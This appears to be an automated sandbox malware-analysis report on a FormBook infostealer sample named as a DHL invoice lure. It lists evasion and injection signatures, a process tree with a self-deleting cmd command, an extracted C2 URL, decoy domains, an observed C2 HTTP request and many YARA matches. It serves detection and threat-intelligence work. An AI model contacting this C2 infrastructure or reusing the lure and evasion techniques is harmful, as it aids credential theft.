Windows Analysis Report invoice dhl.delivery document and original invoice sign.exe

Overview

General Information

Sample Name: invoice dhl.delivery document and original invoice sign.exe
Analysis ID: 532858
MD5: ebce26da75669d94dbc0550bf394b204
SHA1: bcc8f769e51cd9f8a160e58840f80a008e2b72e2
SHA256: 5fef546d71e9ed9f2e457bfd9aeb23a42a5074af37599c7fe4dcfeb8f687723c
Tags: DHL, exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Creates processes with suspicious names
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • invoice dhl.delivery document and original invoice sign.exe (PID: 3452 cmdline: "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe" MD5: EBCE26DA75669D94DBC0550BF394B204)
    • invoice dhl.delivery document and original invoice sign.exe (PID: 6188 cmdline: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe MD5: EBCE26DA75669D94DBC0550BF394B204)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 7056 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 7092 cmdline: /c del "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cuteprofessionalscrubs.com/9gr5/"], "decoy": ["newleafcosmetix.com", "richermanscastle.com", "ru-remonton.com", "2diandongche.com", "federaldados.design", "jeffreycookweb.com", "facecs.online", "xmeclarn.xyz", "olgasmith.xyz", "sneakersonlinesale.com", "playboyshiba.com", "angelamiglioli.com", "diitaldefynd.com", "whenevergames.com", "mtheartcustom.com", "vitalactivesupply.com", "twistblogr.com", "xn--i8s140at3d6u7c.tel", "baudelaireelhakim.com", "real-estate-miami-searcher.site", "131122.xyz", "meta-medial.com", "carvanaworkers.com", "mimamincloor.com", "aglutinarteshop.com", "portal-arch.com", "mandeide.com", "golfteesy.com", "carteretcancer.center", "cuansamping.com", "jhhnet.com", "oetthalr.xyz", "toesonly.com", "ctbizmag.com", "searchonzippy.com", "plantedapts.com", "matoneg.online", "takened.xyz", "meta4.life", "africanizedfund.com", "jukeboxjason.com", "folez.online", "troddu.com", "802135.com", "guiamat.net", "gladiasol.com", "meditationandyogacentre.com", "metaverserealestateagent.com", "boogyverse.net", "melissa-mochafest.com", "cozsweeps.com", "pickles-child.com", "metaversemediaschool.com", "ahfyfz.com", "ses-coating.com", "pozada.biz", "loldollmagic.com", "mountfrenchlodge.net", "25680125.xyz", "inusuklearning.com", "dnteagcud.xyz", "yupan.site", "acloud123.xyz", "asadosdonchorizo.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |

Unpacked PEs

Source | Rule | Description | Author | Strings
3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |

Sigma Overview

System Summary:

Sigma detected: Possible Applocker Bypass
Source: Process started, Author: juju4: Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 7056

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook
Multi AV Scanner detection for submitted file
Source: invoice dhl.delivery document and original invoice sign.exe, ReversingLabs: Detection: 28%
Yara detected FormBook
Source: Yara match, File source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, type: MEMORY
Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: invoice dhl.delivery document and original invoice sign.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: invoice dhl.delivery document and original invoice sign.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.438653461.00000000033D0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000003.361108586.0000000001000000.00000004.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437330999.000000000155F000.00000040.00000001.sdmp, msdt.exe, 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp, msdt.exe, 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: invoice dhl.delivery document and original invoice sign.exe, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000003.361108586.0000000001000000.00000004.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437330999.000000000155F000.00000040.00000001.sdmp, msdt.exe, msdt.exe, 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp, msdt.exe, 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp
          Source: Binary string: msdt.pdb source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.438653461.00000000033D0000.00000040.00020000.sdmp
Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 4x nop then pop ebx, 3_2_00407B1A
Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 4x nop then pop edi, 3_2_0040E460
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 4x nop then pop ebx, 11_2_00707B1B
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 4x nop then pop edi, 11_2_0070E460

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Network Connect: 44.227.76.166 80
Source: C:\Windows\explorer.exe, Domain query: www.mimamincloor.com
Source: C:\Windows\explorer.exe, Domain query: www.federaldados.design
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.cuteprofessionalscrubs.com/9gr5/
Source: global traffic, HTTP traffic detected: GET /9gr5/?KrIxB=GtutZXLXlTaHD4Kp&WDH=t25TG+ulm10lwD+thJsAbOsGVXQVz47UhtdUUfJn66HyA3cvvtnG3RYsUIYwzVeadKzVomQtsQ== HTTP/1.1, Host: www.federaldados.design, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: Joe Sandbox View, IP Address: 44.227.76.166
Source: msdt.exe, 0000000B.00000002.623782144.00000000052FF000.00000004.00020000.sdmp, String found in binary or memory: http://federaldados.design
Source: explorer.exe, 00000005.00000000.397083667.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.383799342.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.425291445.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.365143157.000000000095C000.00000004.00000020.sdmp, String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: unknown, DNS traffic detected: queries for: www.federaldados.design

E-Banking Fraud:

Yara detected FormBook

System Summary:

Malicious sample detected (through community Yara rule)
Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample, Static PE information: Filename: invoice dhl.delivery document and original invoice sign.exe
Executable has a suspicious name (potential lure to open the executable)
Source: invoice dhl.delivery document and original invoice sign.exe, Static file information: Suspicious name
Source: invoice dhl.delivery document and original invoice sign.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
